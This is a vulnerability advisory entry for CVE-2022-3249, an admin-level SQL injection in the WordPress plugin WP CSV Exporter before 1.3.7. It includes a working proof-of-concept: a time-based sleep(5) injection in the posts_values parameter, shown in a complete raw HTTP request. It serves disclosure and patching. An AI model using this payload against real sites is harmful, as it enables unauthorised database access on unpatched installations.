Lucene search
Asif Nawaz MinhasWPEX-ID:6503DA78-A2BF-4B4C-B56D-21C8C55B076EHistoryNov 09, 2022 - 12:00 a.m.
WP CSV Exporter < 1.3.7 - Admin+ SQLi
2022-11-0900:00:00
Asif Nawaz Minhas
247
sql injection
admin
intercept request
delayed response
security vulnerability
wordpress plugin
EPSS
0.001
Percentile
37.9%
The plugin does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high privilege users such as admin to perform SQL injection attacks
As an admin, go to Tools > CSV Export, leave everything as default and click on Export POSTS CSV
Intercept the request made and change the posts_values%5B%5D=post_name to posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a)
This will delay the response of 5s
Raw request:
POST /wp-content/plugins/wp-csv-exporter/admin/download.php HTTP/1.1
Cookie: [admin+]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Upgrade-Insecure-Requests: 1
Connection: close
_wpnonce=7d0447e58b&post_id=post_id&type=post&posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a)&posts_values%5B%5D=7*7&posts_values%5B%5D=post_content&post_status%5B%5D=publish&limit=0&offset=0&order_by=DESC&post_date_from=&post_date_to=&post_modified_from=&post_modified_to=&string_code=UTF-8Related
cvelist
cvelist
CVE-2022-3249 WP CSV Exporter < 1.3.7 - Admin+ SQLi
2022-12-05 16:50:36
nvd
nvd
CVE-2022-3249
2022-12-05 17:15:09
wpvulndb
wpvulndb
WP CSV Exporter < 1.3.7 - Admin+ SQLi
2022-11-09 00:00:00
prion
prion
Sql injection
2022-12-05 17:15:00
cve
cve
CVE-2022-3249
2022-12-05 17:15:09
patchstack
patchstack